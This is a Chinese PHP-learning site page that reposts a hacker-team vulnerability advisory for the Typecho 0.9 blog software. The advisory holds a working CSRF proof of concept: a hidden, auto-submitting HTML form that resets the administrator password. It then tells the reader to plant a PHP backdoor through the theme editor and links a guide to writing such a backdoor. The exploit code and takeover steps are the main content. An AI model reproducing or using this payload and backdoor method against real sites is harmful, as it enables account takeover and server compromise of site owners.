网站地图    收藏   

主页 > 后端 > 网站安全 >

Typecho 0.9(13.12.12) CSRF修改管理员密码漏洞 - 网站安

来源:自学PHP网    时间:2015-04-16 23:15 作者: 阅读:

[导读] We enjoy hacking of life in day and night _______________________________________________ [+] HSID: FF000-HSDB-0002 [+] Author: Evi1m0...

 We enjoy hacking of life in day and night.
 
                _______________________________________________
 
                  [+] HSID: FF000-HSDB-0002
                  [+] Author: Evi1m0 <evi1m0.bat@gmail.com>
                  [+] Team: FF0000 TEAM <http://www.ff0000.cc>
                  [+] From: HackerSoul <http://www.hackersoul.com>
                  [+] Create: 2014-06-22
                _______________________________________________
 
 
                                  -= Main =-
 
[*] 1. Description
    
http://typecho/admin/profile.php page, Change password form CSRF vul.
http://typecho/admin/themes.php, We can write the PHP Backdoor in this page.
 
[*] 2. CSRF POC
 
<div style="display: none;">
<form action="http://typecho/index.php/action/users-profile" method="post" name="ff0000team" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="password" value="bug1024"/>
<input type="hidden" name="confirm" value="bug1024" />
<input name="do" type="hidden" value="password" />
<button type="submit"></button>
</form>
</div>
<script>
setTimeout("document.ff0000team.submit()", 2000);
</script>

 

 
 
[*] 3. GETSHELL
 
http://typecho/admin/theme-editor.php page, Write backdoor.
Or, Write this: http://www.hackersoul.com/post/PHP中使用按位取反函数创建后门.html
 
 
                                  -= END =-
      

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论